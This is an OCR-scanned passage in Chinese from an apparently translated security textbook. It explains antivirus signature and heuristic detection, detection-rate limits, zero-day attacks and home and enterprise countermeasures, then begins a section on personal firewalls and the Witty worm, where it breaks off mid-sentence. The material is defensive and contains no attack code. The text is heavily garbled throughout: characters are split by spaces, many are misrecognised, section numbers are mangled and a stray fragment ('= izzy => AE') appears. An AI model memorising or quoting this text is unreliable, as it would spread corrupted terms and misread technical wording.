种 扫描 引擎 以 创建 更 健壮 的 产品 。 访 问 时 保护 确保 用 户 在 日 常 处 理 文 件 和 程序 时 有 某 种 “实时 ”保护 ， 并 且 帮 助 阻止 用 户 可 能 没 
有 或 者 无 法 手工 扫描 的 恶意 程序 。 访 问 时 保护 增加 了 新 引入 的 可 执行 文件 在 执行 前 得 到 扫描 的 可 能 性 。 最 好 的 做 法 是 定时 运行 自 
己 的 按 需 扫描 。 定 时 的 脱 机 扫描 能 够 帮助 检测 在 实时 引擎 投入 运行 之 前 装 入 的 恶意 程序 。 


7.3.3 ”基于 特征 码 的 检测 
基于 特征 码 的 检测 从 业界 刚刚 出 现时 就 为 防 病毒 公司 所 用 。 这 是 防 病毒 产品 的 收入 来 源 ， 因 为 它 代表 着 已 知 恶 意 病毒 的 列 


表 ， 保 持 这 个 具有 不 确定 的 未 来 的 行业 的 现金 流 稳定 性 。 防 病毒 公司 依靠 消费 者 和 公司 的 订阅 作为 收入 的 稳定 来 源 。 这 些 订 阅 包 
括 产 品 更 新 和 补丁 ， 但 是 最 重要 的 是 每 天 /每 周 分 发 的 特征 码 更 新 文件 ， 这 保证 用 户 的 防 病毒 产品 具有 最 新 的 病毒 特征 码 。 


= 
izzy 
=> 
AE 


特征 码 本 身 可 能 很 简单 ， 像 字符 串 模式 匹配 或 者 字 节 特征 码 ， 也 可 能 是 复杂 的 检查 可 疑 文 件 特性 以 估计 其 功能 的 计 分 系统 。 
字符 串 匹 配 特征 码 可 以 包含 通配符 ， 具 有 足以 检测 病毒 在 执行 中 试图 变形 而 进行 的 填充 或 者 垃圾 数据 的 灵活 性 。 特 征 码 模式 和 格 
式 在 各 种 防 病毒 产品 中 各 有 不 同 ， 每 种 产品 都 使 用 不 同 的 算法 和 逻辑 来 选择 病毒 的 特性 标识 ， 以 此 形成 特征 码 。 但 是 ， 基 本 的 过 
程 包括 了 反 汇 编 已 知 病毒 的 二 进 制 代 码 ， 并 且 记 录 实 现 病毒 核心 功能 的 字 节 顺序 。 字 节 顺 序 特 征 码 的 一 个 非常 简单 的 例子 是 检测 
可 执行 (PE) 文件 ， 这 是 Windows 系 统 上 每 个 可 执行 程序 必须 包含 的 格式 ， 检 测 的 方法 是 扫描 文件 寻找 MZ header 字 节 序 列 
4D5A。 每 个 PE 文件 都 包含 这 两 个 字 节 。 字 节 顺 序 特 征 码 的 更 实际 例子 是 大 部 分 恶意 软件 ， 特 别 是 木马 、 蠕 虫 和 后 门 用 作 源 代码 
一 部 分 的 著名 加 密 或 者 压缩 程序 库 (例如 UPX (Ultimate Packer for Executables) ) 。 





其 他 类 型 的 特征 码 基 本 上 是 一 个 用 于 计 分 系统 的 模板 ， 在 扫描 引擎 逻辑 中 实现 ， 并 且 依 赖 于 扫描 中 动态 填写 的 特征 码 模 板 。 
模板 实例 应 该 包含 各 种 可 能 的 恶意 文件 属性 ， 例 如 程序 使 用 何 种 程序 库 (也 就 是 允许 互联 网 连接 性 、 加 密 的 程序 库 和 敏感 系统 程 
序 库 ) ， 文 件 是 否 打 包 或 者 压缩 (病毒 常常 将 文件 打包 以 避 开 特征 码 检测 引擎 ) ; 是否 具 有 加 密 / 解 密 例 程 (这 可 能 表明 其 加 密 
自身 的 代码 以 躲避 防 病 毒 检测 ) ;以 及 文件 (如果 是 可 执行 文件 ) 的 可 移植 可 执行 文件 头 部 分 中 的 其 他 属性 ， 这 些 属性 可 能 表明 
用 于 欺骗 特征 码 扫 描 程序 的 自 改 或 者 无 效 值 ( 例 如 无 效 的 程序 入 口 ) 。 


除了 非常 基本 的 常规 表达 式 模式 匹配 和 和 有些“ 实时 性 ”的 特征 码 模板 以 外 ， 特 征 码 本 身 没有 太 多 固有 的 动态 能 力 。 最 终 ， 对 
于 所 检测 的 病毒 必须 有 精确 的 特征 码 匹 配 ， 正 如 我 们 已 经 说 明 过 的 那样 ， 病 毒 很 少 有 这 种 可 预测 性 。 


基于 特征 码 的 检测 有 多 种 经 过 证 明 的 弱点 : 


.依赖 于 必须 不 断 更 新 的 特征 码 数据 库 ， 需 要 供应 商 〈 生 成 列表 ) 和 消费 者 (下 载 /安装 ) 两 方面 的 工作 。 


- 特征 码 数据 库 是 某 个 时 点 的 静态 快照 ， 在 发 布 给 消费 者 后 立刻 就 过 时 了 。 
“ 存在 着 数 十 万 种 病毒 ， 每 种 病毒 都 可 能 有 数 千 种 分 支 和 变种 ， 这 些 都 需要 不 同 的 特征 码 ; 这 还 只 包含 防 病毒 公司 所 知晓 的 
病毒 。 
只 能 检测 具有 特征 的 病毒 。 
- 自修 改 的 恶意 软件 如 多 态 病毒 将 挫败 基于 特征 码 的 检测 引擎 。 但 是 ， 大 部 分 防 病 毒 引擎 已 经 演化 ， 可 以 模拟 多 态 代 码 生 成 
和 混 消 或 将 其 沙 箱 化 ， 这 样 加 密 的 代码 可 以 与 特征 码 匹 配 而 无 所 通 形 。 


一 家 独立 的 防 病毒 测试 集团 av-test.org 的 测试 结果 表明 ， 防 病毒 产品 相当 擅长 于 根据 特征 码 检 测 病毒 (2 
见 https://www.av-test.org/en/compare-manufacturer-results/) 。 在 他 们 2015 年 11 月 ~ 12 月 的 报告 中 ， 行 业 对 该 时 期 广泛 
流行 的 恶意 软件 有 99% 的 平均 检 出 率 。 但 是 ， 这 并 不 能 表明 防 病毒 产品 防御 威胁 的 能 力 一 一 这 个 结果 只 表现 了 防 病毒 公司 编写 
特征 码 的 能 力 。 你 应 该 考虑 到 在 具有 几 十 年 的 实践 经 验 后 ， 防 病毒 供应 商 应 该 相当 擅长 于 这 一 过 程 。 





734 ”基于 异常 /启发 式 检测 


局 发 式 检测 试图 弥补 基于 特征 码 检测 的 缺点 ， 并 且 在 发 现 病 毒 和 防 病毒 供应 商 制作 和 发 行 特征 码 之 前 为 最 终 用 户 提供 基本 的 
防御 。 启 发 式 检测 不 扫描 系统 寻找 已 知 的 静态 特征 ， 而 是 观察 系统 行为 和 关键 的 “挂钩 点 ”， 以 主动 的 方式 发 现 异 常 活动 。 启 发 
式 技 术 的 一 些 实例 包括 : 


“ 检查 经 常 被 恶意 软件 侵害 的 关键 系统 组 件 ， 例 如 SSDT、IDT 以 及 API 函 数 的 钩子 。 





. 行为 阻塞 剖析 或 者 建立 应 用 程序 常规 行为 基线 一 一 当 应 用 程序 表现 出 异常 的 行为 时 ， 可 以 认为 应 用 程序 可 能 出 现 破 坏 
(MS Word 试 图 连接 到 互联 网 是 一 个 例子 ) 。 


:内存 属性 监控 一 一 换 句 话 说， 如果 内 存 页 面 标识 为 可 执行 ， 它 将 受到 比 不 可 执行 内 存 更 紧密 的 监控 ， 特 别 是 该 属性 在 运 和 
时 出 现 变 化 的 时 候 。 


- 文件 二 进 制 代码 中 程序 可 移植 可 执行 (Portable Executable, PE) 段 信息 的 分 析 ， 了 寻找 残缺 的 部 分 或 者 用 于 欺骗 分 析 引 党 
的 无 效 项 目 。 


一 个 进程 或 者 程序 中 不 规则 代码 及 /或 字符 串 的 存在 。 

- 关注 多 个 区 域 的 基于 权重 和 规则 的 计 分 系统 。 

. 打包 、 混 清 或 者 加 密 代码 / 段 的 存在 。 

- 分 析 反 编译 / 反 汇 编 代 码 ， 确 定 异 常 操作 ， 如 静态 (并 且 有 效 ) 的 地 址 与 指针 的 计算 。 
. 使 用 人 工 物 能 中 的 专家 系统 概念 ， 凭 借 这 种 产品 根据 数据 集 学 习 行 为 预测 。 

注意 : 有 些 防 病毒 引擎 使 用 这 里 描述 的 变形 作为 特征 码 或 者 评分 算法 的 数据 。 


防 病毒 产品 已 经 得 以 发 展 ， 它 们 使 用 的 优化 启发 式 功 能 不 再 大 量 占用 系统 资源 ， 对 系统 性 能 也 没有 明显 的 影响 。AV- 
test.org 的 报告 说 明 ， 行 业 产品 在 每 天 的 网 站 访问 、 软 件 下 载 、 程 序 运 行 及 安装 和 数据 复制 过 程 中 ， 对 计算 机 速度 的 平均 影响 仅 
为 两 秒 。 在 可 用 性 方面 ， 在 一 次 系统 扫描 中 ， 将 合法 软件 错误 检测 为 恶意 软件 的 行业 平均 比率 为 5%。 防 病毒 产品 已 经 取得 了 进 
展 ， 但 是 仍 有 提升 的 空间 。 


74 对 防 病毒 技术 的 作用 的 评论 


我 们 已 经 描述 了 防 病毒 技术 的 功能 和 技术 细节 ， 但 是 现在 我 们 将 转 而 讨论 在 计算 机 安全 界 中 防 病毒 所 起 的 作用 。 这 种 作用 是 
有 争议 的 ， 并 且 已 经 争论 了 许多 年 。 我 们 将 从 好 的 一 面 开始 讨论 。 
741 ” 防 病毒 技术 擅长 的 方面 


对 于 防 病毒 技术 来 说 有 个 好 消息 ， 它 们 拥有 一 席 之 地 并 且 在 某 些 方面 做 得 很 好 。 正 如 7.3.3 节 所 说 明 的 那样 ， 防 病毒 技术 在 
检测 至 少 具有 一 个 已 知 特征 的 病毒 时 有 非常 高 的 精确 性 。 这 种 能 力 是 很 重要 的 ， 因 为 它 摘 到 了 很 多 “靠近 地 面 的 果实 ”一 一 也 
就 是 说 ， 还 存在 于 世上 的 已 经 流行 了 10 年 的 恶意 软件 。 这 类 恶意 软件 很 容易 被 最 现代 的 防 病毒 引擎 捕捉 到 。 简 而 言 之 ， 防 病毒 
技术 一 般 都 擅长 捕捉 已 知 的 威胁 。 


安全 专家 不 应 该 太 快 就 不 考虑 这 种 功能 。 在 当今 高 度 分 布 式 的 企业 网 络 中 ， 基 本 的 系统 和 网 络 健康 难以 维护 。 强 大 的 防 病毒 
解决 方案 被 看 成 必需 品 ， 是 系统 健康 的 基本 需求 。 


作为 集团 防 病毒 策略 的 一 部 分 ， 基 于 主机 和 网 络 级 别 的 控制 能 够 大 大 改进 整体 安全 态势 ， 尤 其 是 当 这 种 控制 与 病毒 感染 和 里 
虫 传播 相关 时 。 在 设计 一 个 企业 防 病毒 策略 时 ， 基 于 网 络 的 控制 ， 例 如 网 络 入 侵 检测 系统 (NIDS) 、 防 火 墙 、 网 络 访问 控制 
(NAC) 设备 以 及 安全 信息 和 事件 管理 器 (SIEM) ， 都 是 基于 主机 的 软件 的 补充 。 恰 当地 配置 和 维护 的 规则 、 警 告 和 过 滤器 能 
够 从 低级 别 到 企业 范围 的 事件 中 避免 病毒 攻击 。 


通过 这 些 设备 收集 的 信息 记录 ， 能 够 大 大 地 增进 对 潜在 的 病毒 威胁 和 可 疑 事件 的 了 解 。 正 确 地 配置 和 维护 这 些 设 备 将 会 对 避 
免 病毒 和 蠕虫 大 有 帮助 ， 并 且 为 需要 监控 和 响应 病毒 事件 的 人 提供 优秀 的 信息 。 


防 病毒 还 能 够 为 普通 家 庭 用 户 这 一 相当 大 的 客户 群 提供 服务 。 防 病毒 产品 能 够 令 人 安心 ， 有 些 时 候 考虑 防 病毒 技术 的 候选 方 
案 是 没有 必要 的 一 一 老奶奶 不 需要 在 一 个 虚拟 机 中 上 网 冲浪 。 在 这 种 系统 中 ， 现 成 的 防 病毒 产品 就 能 满足 。 


742 ” 防 病 毒 业 界 的 领先 者 


确定 行业 领先 者 的 最 佳 做 法 是 参考 来 自 AV-Test Institute、AV-Comparatives、Virus Bulletin、PCMag.com 等 网 站 的 测 


743 ” 防 病 毒 的 难题 


很 明显 ， 防 病毒 技术 精通 特征 码 检测 并 且 具 有 相当 引 人 注 目的 用 于 所 面临 的 恶意 软件 的 启发 式 检测 。 但 是 ， 防 病毒 常常 达 不 
到 预期 效果 ， 并 且 因为 遗漏 了 一 些 非常 醒目 的 恶意 软件 而 臭名 昭著 。 在 本 小 节 中 ， 我 们 将 基于 实验 数据 对 这 些 弱点 进行 评论 。 


检测 率 


为 什么 防 病毒 产品 不 能 发 现 恶 意 软件 ”这 种 情况 发 生 的 频率 如 何 ” 你 在 本 章 中 看 到 的 一 些 来 自己 知 恶意 软件 的 独立 测试 的 数 
字 表 现 了 极 高 的 检测 率 。 这 种 差异 可 能 指出 了 现实 和 实验 中 的 悬殊 差别 。 根 据 用 于 测试 产品 的 恶意 软件 样本 的 广度 和 深度 ， 测 试 
结果 也 有 很 大 的 不 同 。 因 为 病毒 的 种 类 有 数 十 万 种 ， 样 本 中 的 细微 差别 可 能 无 法 发 现 。 


防 病毒 产品 在 检测 恶意 软件 中 成 败 各 半 有 一 些 符 合 逻辑 的 原因 。 我 们 已 经 介绍 了 许多 种 原因 ， 例 如 当今 病毒 的 复杂 性 和 庞大 


的 数量 。 检 测 可 能 归结 为 资源 的 问题 没有 足够 的 工程 师 来 及 时 制作 和 测试 特征 码 。 防 病毒 产品 还 必须 保持 低调 并 且 不 影 
响 系统 性 能 ， 这 迫使 软件 工程 决策 可 能 对 检测 率 产生 负面 影响 。 启 发 式 引 擎 已 经 被 证 明 会 产生 更 高 的 假 阳 性 率 ， 这 在 企业 环境 中 
是 无 法 接受 的 。 因 此 ， 防 病毒 公司 可 能 必须 控制 检测 能 力 以 改进 假 阳性 率 。 





对 新 型 威胁 的 响应 
成 功 的 防 病毒 产品 最 关键 的 措施 之 一 可 能 是 该 公司 对 新 兴 的 恶意 软件 的 响应 。 


Taget 泄 圳 事件 发 生 时 ， 来 自 各 个 安全 供应 商 的 研究 人 员 立 即 着 手 调查 、 捕 捉 和 分 析 所 涉 的 可 疑 恶意 软件 。 发 现 Stuxnet 
时 ， 对 监测 控制 和 数据 采集 (SCADA) 系统 以 及 Stuxnet 如 何 控制 此 类 系统 的 研究 就 成 为 当务之急 。 安 全 供应 商 快速 响应 这 些 新 
型 威胁 至 天 重要 ， 因 为 它们 知道 ， 企 业 和 家 庭 用 户 依赖 防 恶意 软件 产品 ， 作 为 端点 的 最 后 一 道 防线 。 提 供 信息 和 解决 方案 的 第 一 
家 供应 商 吸引 人 们 的 注意 力 ， 在 销售 产品 时 处 于 有 利 地 位 。 与 Target 汇 露 事 件 和 Stuxnet 一 样 ， 现 在 大 多 数 攻 击 都 是 有 针对 性 
的 ， 所 以 新 的 威胁 不 像 以 前 那么 广泛 。 攻 击 通常 很 低调 ， 专 为 某 个 特定 公司 设计 ， 例 如 2014 年 零售 连锁 店 Target、Home 
Depot 和 Michaels 的 泄露 事件 。 注 重 安全 的 企业 必须 有 强 干 的 事故 响应 团队 ， 作 为 其 安全 团队 的 一 部 分 ， 或 者 雇佣 来 自 安全 供 
应 商 的 此 类 团队 。 


就 这 就 有 了 客户 接受 度 以 及 实现 的 问题 : 仅仅 有 可 用 的 特征 码 并 不 意味 着 客户 将 他 的 防 病毒 产品 配置 为 自动 下 载 和 安装 更 
新 。 因 此 ， 采 用 最 新 的 特征 码 只 取决 于 客户 ， 所 以 防 病毒 产品 的 成 功 (以 及 活跃 病毒 传播 的 阻止 ) 始终 由 客户 决定 。 这 一 事实 特 
别 适用 于 家 庭 用 户 ， 这 就 是 大 部 分 针对 家 庭 用 户 的 机 会 主义 攻击 都 能 成 功 的 原因 。 属 于 某 个 行业 的 大 型 网 络 和 企业 环境 必须 遵循 
监管 实体 或 者 机 构 定义 的 政策 和 法 规 ， 如 健康 保险 流通 与 责任 法 案 (HIPAA) 。 防 病毒 更 新 必须 首先 下 载 到 中 心 管理 服务 器 ， 
然后 再 由 服务 器 将 更 新 分 发 到 连接 该 网 络 的 各 个 主机 。 这 些 更 新 被 设置 为 计划 安装 ， 可 能 每 周 或 者 每 月 一 次 。 在 这 一 时 隙 中 ， 主 
机 存在 着 漏洞 。 对 于 延迟 更 大 的 生产 (活动 ) 服务 器 来 说 情况 就 更 糟 ， 因 为 大 部 分 公司 要 求 在 更 新 应 用 到 活动 服务 器 之 前 必须 在 
脱 机 网 络 中 进行 手工 测试 ， 否 则 ， 更 新 中 的 不 兼容 或 者 缺陷 可 能 导致 活动 服务 器 重新 启动 ， 这 会 影响 业务 操作 。 


防 病毒 公司 发 行 更 新 的 特征 码 以 及 终端 主机 安装 更 新 之 间 的 时 延 可 能 是 特征 码 扫描 概念 的 最 大 弱点 ， 并 且 一 直 折磨 着 整个 业 
界 。 并 不 是 所 有 的 集团 公司 网 络 都 已 经 实施 或 者 正确 地 遵循 积极 的 防 病毒 更 新 策略 。 所 以 不 难 找到 具有 几 个 月 到 几 年 之 前 的 过 时 
特征 码 数 据 库 的 生产 服务 器 。 


记 住 ， 特 定 的 供应 商 很 快 地 发 行 更 新 并 不 意味 着 这 些 更 新 是 高 质量 的 。 轻 率 的 反应 和 完全 没 反应 一 样 危 险 。 而 且 ， 任 何 特定 
防 病毒 公司 的 响应 时 间 取 决 于 公司 如 何在 得 知 病毒 时 对 病毒 威胁 进行 分 类 。 如 果 供 应 商 将 某 个 病毒 看 作 中 等 的 威胁 ， 它 将 较 少 注 
意 这 个 病毒 ， 从 而 减 慢 了 响应 时 间 。 


最 后 ， 考 虑 供应 商 发 行 更 新 的 频 度 也 很 重要 。 某 个 供应 商 可 能 对 于 引起 媒体 关注 的 大 爆发 反应 很 快 ， 但 是 它 是 否 能 在 整 年 中 
寺 续 地 提供 高 质量 和 定期 的 更 新 可 能 完全 是 两 码 事 。 


零 日 攻击 


FH (0-day) 攻击 是 针对 系统 中 未 泄露 的 漏洞 的 攻击 代码 。 我 们 已 经 讨论 过 ， 基 于 特征 码 的 检测 不 能 检测 动态 修改 代码 的 
恶意 软件 (例如 变形 和 多 态 病毒 ) ， 局 发 式 检测 也 可 能 无 法 检测 高 级 的 恶意 软件 。 零 日 级 别 的 恶意 软件 代表 着 任何 检测 系统 最 严 
手 的 目标 。 因 为 防 病毒 检测 策略 依赖 于 之 前 所 了 解 的 事实 (不 管 是 特征 码 还 是 启发 式 行为 ) ， 这 使 得 零 日 检测 成 为 一 个 很 大 的 问 
题 。 尽 管 某 些 零 日 攻击 可 能 由 于 底层 利用 上 的 相似 性 而 被 防 病毒 引 警 发现 (例如 ， 许 多 零 日 攻击 试图 打开 一 个 远程 外 壳 程 序 ， 人 允 
许 远程 控制 台 访 问 受害 机 器 ) ， 但 是 大 部 分 都 能 够 绕 过 防 病毒 检测 ， 这 是 因为 防 病毒 引擎 无 法 可 靠 地 检测 它 所 不 了 解 的 事物 。 


防 病毒 软件 中 的 漏洞 


任何 软件 都 不 是 完美 的 。 防 病毒 产品 也 可 能 因为 软件 中 的 Bug 和 设计 缺陷 而 出 现 漏洞 。 大 部 分 著名 的 安全 公司 都 深 知 这 一 风 
险 ， 始 终 谨 慎 地 确保 所 发 行 的 产品 进行 了 多 次 漏洞 检测 。 


记 住 ， 安 全 产品 中 的 漏洞 使 它们 成 为 恶意 软件 编写 者 首先 利用 的 对 象 ， 刺 激 他 们 创建 以 防 病毒 产品 为 目标 ， 避 开 检测 的 恶意 
软件 。 


7.5 ” 防 病 毒 业 界 的 未 来 


特征 码 检测 既是 防 病毒 行业 的 优势 ， 也 是 其 弱点 。 说 它 是 优势 ， 是 因为 特征 码 为 防 病毒 产品 提供 了 精确 查 明 特 定 恶意 软件 且 
假 阳 性 最 少 的 能 力 。 说 它 是 弱点 ， 是 因为 特征 码 方法 无 法 应 对 今日 所 见 数 以 百 万 计 的 恶意 软件 的 侵袭 。 防 病毒 行业 的 未 来 取决 于 
如 何 适 应 不 断 变化 的 威胁 局 面 ， 这 种 局 面 是 由 每 月 制作 数 百 万 种 病毒 的 攻击 者 造成 的 。 


对 防 病毒 行业 威胁 最 大 的 是 恶意 软件 工厂 。 不 管 防 病毒 软件 在 未 来 会 增加 什么 功能 ， 如 果 无 法 解决 恶意 软件 工厂 的 问题 ， 行 
业 就 无 所 作为 。 恶 意 软 件 工厂 是 Christopher Elisan 在 《Malware，Rootkits&Botnets: A Beginner’ s Guide) (McGraw- 
Hil 于 2012 年 出 版 ) 一 书 中 首次 提出 的 概念 ， 在 这 种 工厂 中 ， 制 作恶 意 软 件 的 速度 令 人 震惊 。 如 果 一 个 恶意 软件 工厂 设施 一 天 能 
制作 出 10 万 个 不 同 的 恶意 软件 样本 ， 如 果 没 有 自动 化 的 沙 箱 系统 分 析 和 收集 来 自 各 个 恶意 软件 样本 的 loC (入 侵 标志 ) ， 研 究 人 
员 就 完全 无 法 应 付 。 特 征 码 自动 从 这 些 IloC 中 产生 ， 也 就 是 说 ， 每 个 样本 对 应 一 个 特征 码 。 因 此 ， 对 于 10 万 个 样本 ， 就 有 10 万 个 
特征 码 。 这 将 使 防 病毒 产品 的 特征 码 数据 库 变 得 爱 肿 ， 这 是 不 可 取 的 。 


产 
为 了 存活 下 去 ， 防 病毒 产品 需要 新 的 恶意 软件 检测 方法 ， 例 如 ， 能 够 了 解 所 有 人 入侵 标志 意义 的 特征 码 方法 。 可 以 考虑 用 数据 
科学 和 机 器 学 习 来 代替 特征 码 创建 。 自 动 化 沙 箱 系 统 和 静态 分 析 系 统 自动 产生 的 数据 经 过 处 理 ， 创 建 有 意义 的 特征 ， 用 于 提出 检 
测 某 个 恶意 软件 家 族 或 者 分 类 的 算法 。 用 一 个 算法 就 可 以 检测 来 自 相同 家 族 或 者 分 类 的 恶意 软件 ， 而 不 是 使 用 一 对 一 的 特征 码 。 


这 并 不 是 说 要 完全 放弃 特征 码 检测 ， 它 依然 可 以 使 用 ， 特 别 是 在 需要 特定 检测 时 。 两 者 的 结合 有 助 于 防 病毒 行业 的 繁荣 。 


7.6 ”小 结 和 对 策 


我 们 在 本 章 中 已 经 相当 深入 地 讨论 了 与 防 病毒 技术 相关 的 各 种 问题 ， 读 者 现在 应 该 已 经 了 解 了 业界 的 最 新 状况 。 对 防 病毒 的 
弱点 和 长 处 也 进行 了 介绍 ; 揭示 了 一 些 隐蔽 的 框架 ; 推测 了 业界 未 来 的 可 能 结果 。 读 者 从 本 章 的 学 习 中 应 该 领会 到 什么 呢 ? 


简单 地 说 ， 现 在 ， 保 留 你 的 防 病毒 产品 ， 等 待 着 结果 。 对 于 普通 的 家 庭 用 户 ， 在 当今 这 个 快速 发 展 的 基于 互联 网 的 世界 里 ， 
防 病毒 是 必要 的 。 因 为 防 病毒 公司 、 产 品 、 集 成 服务 的 数量 ， 防 病毒 已 经 成 为 对 抗 恶 意 感染 必要 的 最 后 防线 。 对 于 家 庭 用 户 ， 解 
决 方案 相对 简单 : 安装 并 且 配 置 自动 定义 更 新 。 必 要 的 更 新 不 需要 任何 用 户 交互 就 能 下 载 和 安装 ， 大 大 改进 你 的 安全 态势 ， 同 时 
又 让 你 省 心 。 


至 于 企业 网 络 ， 我 们 强烈 建议 由 一 位 专门 的 安全 管理 员 负 责 不 断 维 护 、 更 新 和 管理 企业 防 病毒 解决 方案 。 如 果 资 源 允 许 ， 建 
立 一 个 安全 响应 团队 ， 或 者 至 少 在 组 织 中 发 现 攻击 时 可 以 找到 一 个 。 


大 部 分 防 病毒 供应 商都 已 经 将 多 个 产品 集成 到 一 个 信息 安全 套件 中 ， 人 允许 从 单个 应 用 程序 中 完成 防 病毒 、 桌 面 防火 墙 、 主 机 
入 侵 检测 甚至 网 络 访问 控制 。 但 是 ， 每 个 企业 必须 确保 100% 的 用 户 更 新 ， 以 维护 100% 有 效 的 防 病毒 解决 方案 。 


很 可 能 ， 防 病毒 行业 不 会 做 出 重大 的 方向 修正 ， 因 为 生意 还 很 好 。 只 要 用 户 知道 防 病毒 产品 在 做 什么 并 且 理 解 其 局 限 性 ， 那 


么 也 没有 什么 问题 。 真 正 的 危险 是 用 户 以 为 防 病毒 产品 将 100% 地 能 够 保护 他 们 免 遭 病毒 和 恶意 软件 的 侵害 。 


用 户 应 该 自己 学 习 防 病毒 产品 所 提供 的 功能 以 及 可 能 的 替代 产品 。 强 烈 建议 掌握 一 些 常识 ,使 用 一 些 非常 基本 的 最 佳 做 法 能 
够 避免 大 部 分 的 恶意 软件 的 打扰: 


- 不 要 在 每 天 使 用 的 计算 机 上 以 管理 员 登 录 。 
- 使 用 内 建 的 Microsoft 技 术 ， 如 数据 执行 保护 (DEP) 。 
+ 使 用 浏览 器 的 保护 模式 。 
` 将 边界 防御 作为 分 层 安全 策略 的 一 部 分 。 
用 户 应 该 预先 计划 并 且 知 道 在 系统 被 感染 时 的 恢复 方法 。 这 种 主动 的 安全 方法 包括 : 
- 在 你 第 一 次 使 用 新 计算 机 时 使 用 Windows 还 原点 和 PC 备份 功能 。 
- 使 用 Symantec Ghost 或 者 相似 的 应 用 程序 创建 整个 系统 的 备份 。 
- 利用 “影子 分 区 ”维护 操作 系统 的 完 余 可 恢复 副本 。 
* 将 关键 数据 备份 到 只 读 媒体 。 


“ 重 映像 ”系统 的 概念 是 发 现 病毒 感染 时 常用 的 一 种 响应 措施 。 重 映像 一 个 系统 通常 包括 通过 仅 包 含 基本 软件 和 系统 文件 的 
基线 备份 映像 覆盖 硬盘 ， 将 系统 恢复 到 “已 知 的 良好 状态 ”。 这 种 措施 实际 上 将 系统 恢复 到 含有 最 少 软件 的 已 知 良好 状态 。 注 意 
不 要 依赖 简单 的 重 映像 作为 对 病毒 感染 的 防御 ， 因 为 备份 的 副本 也 可 能 被 感染 。 而 且 ， 攻 击 方向 仍然 存在 于 你 刚刚 恢复 的 系统 
上 ， 随 时 可 能 被 攻击 者 再 次 利用 。 


第 8 章 ”主机 保护 系统 


你 的 企业 主机 是 企业 的 第 一 道 和 最 后 一 道 防线 。 不 管 是 工作 站 、 服 务 器 还 是 网 络 设备 ， 所 有 这 些 主机 都 成 为 攻击 者 的 目标 ， 
用 于 向 你 的 操作 系统 注入 任意 数量 的 恶意 软件 。 你 所 重视 的 是 防范 这 些 主机 ， 在 任何 时 候 任 何 地 点 避免 多 种 类 型 的 恶意 软件 爆 
发 。 目 前 为 止 ， 我 们 已 经 介绍 了 恶意 软件 技术 、 各 种 功能 ， 甚 至 提供 了 一 些 恶 意 病毒 和 Rootkit 的 有 效 实例 一 一 所 有 这 些 都 针对 
你 的 主机 。 我 们 已 经 讨论 了 防 病毒 程序 及 其 功能 和 局 限 性 。 现 在 我 们 来 看 看 其 他 一 些 基 于 主机 的 安全 产品 ， 这 些 产 品 设计 用 于 保 
护 你 的 系统 。 


8.1 个 人 防火 墙 功能 


个 人 防火 墙 是 设计 用 于 控制 进出 计算 机 的 网 络 流量 的 基于 主机 应 用 程序 ， 根 据 默认 或 者 自 定义 的 安全 策略 允许 或 者 拒绝 通 
信 。 个 人 防火 墙 在 规模 上 与 传统 的 防火 墙 不 同 ， 是 设计 用 于 最 终 用 户 的 。 个 人 防火 墙 只 为 工作 于 所 安装 的 主机 上 的 最 终 用 户 提供 
防御 。 大 部 分 个 人 防火 墙 被 配置 为 以 两 种 模式 操作 : 一 是 自动 模式 ， 这 意味 着 防火 墙根 据 安全 策略 允许 或 者 拒绝 流量 ; 另 一 种 是 
手动 模式 ， 这 意味 着 最 终 用 户 选 择 所 采取 的 措施 。 整 体 上 ， 个 人 防火 墙 可 以 看 作 夜总会 的 保镖 ， 评 佑 所 有 出 入 的 人 ， 验 证 其 可 信 
性 、 行 为 和 威胁 。 许 多 个 人 防火 墙 应 用 程序 通过 使 用 静态 特征 码 集 而 具有 入 侵 检测 功能 。 但 是 ， 我 们 在 稍 后 的 第 9 章 中 将 要 讨 


论 ， 基 于 特征 码 的 检测 引擎 的 好 坏 仅 取 决 于 特征 码 集 。 
大 部 分 个 人 防火 墙 提 供给 最 终 用 户 或 者 管理 员 相当 多 的 功能 ， 例 如 : 
: 入 站 和 出 站 连接 警告 。 
* 关于 主机 流量 的 目标 地 址 信息 。 
- 试图 连接 到 主机 的 应 用 程序 信息 。 
“ 各 种 试图 访问 网 络 资源 的 应 用 程序 的 控制 。 
对 自发 流量 隐藏 系统 ， 抵 御 远 程 端口 扫描 。 
- 阻止 本 地 应 用 程序 未 经 许可 访问 网 络 上 其 他 系统 的 企图 。 
- 监控 监听 入 站 网 络 连接 的 所 有 应 用 程序 。 
有 许多 个 人 防火 墙 解决 方案 。 其 中 一 些 是 免费 的 ， 其 他 则 是 总 体 安全 解决 方案 的 一 部 分 。 选 择 个 人 防火 墙 时 ， 最 重要 的 是 知 
道 自己 的 需求 ， 以 及 不 同 防火 墙 的 功能 是 否 符合 这 些 需求 。 
个 人 防火 墙 的 局 限 性 


虽然 个 人 防火 墙 能 显著 地 改进 你 的 企业 网 络 安全 态势 ， 但 是 它们 也 将 天 生 的 局 限 性 和 弱点 引入 企业 网 络 。 个 人 防火 墙 并 不 减 
少 网 络 感知 的 服务 ， 它 是 一 个 消费 系统 资源 并 且 可 能 成 为 攻击 目标 的 附加 服务 ; 设想 一 下 第 一 个 针对 个 人 防火 墙 的 蠕虫 Witty 


Worm, 


o Witty Worm 





恶意 软件 系统 Witty Worm 最 早 发 布 于 2004 年 ， 并 不 像 它 的 兄弟 们 那样 具有 传染 性 。 但 是 ， 在 这 里 提 及 它 的 原因 是 它 的 主 功 
能 之 一 ， 即 完全 绕 过 特定 供应 商 的 基于 主机 的 个 人 防火 墙 。 你 会 问 它 是 如 何 做 到 的 ”好 ， 让 我 们 来 回忆 一 下 。 

在 被 发 现 的 时 候 ，Witty Worm 已 经 在 不 到 一 个 小 时 内 顺利 地 感染 了 大 约 12000 个 非 家 庭 系统 。 这 个 蠕虫 不 能 到 达 更 多 系统 
的 主要 原因 是 它 所 针对 的 系统 。 这 些 受 害 者 都 运行 了 RealSecure 的 BlackICE 个 人 防火 墙 。Witty 也 只 感染 和 摧毁 具有 特定 版 本 的 
BlackICE 的 计算 机 ， 所 以 这 种 蠕虫 的 生命 期 很 得 ， 因 为 它 与 其 他 应 用 程序 不 兼容 及 /或 没有 添加 繁殖 功能 。 同 样 ， 我 们 来 看 看 这 
种 蠕虫 如 此 成 功 地 战胜 个 人 防火 墙 的 一 些 原因 。 

开发 ”Witty 本 身 的 繁殖 技术 有 限 ; 它 直接 针对 运行 Black1CE 版 本 的 网 络 系统 。 在 感染 时 ，Witty Worm 仅 仅 利 用 有 漏洞 的 
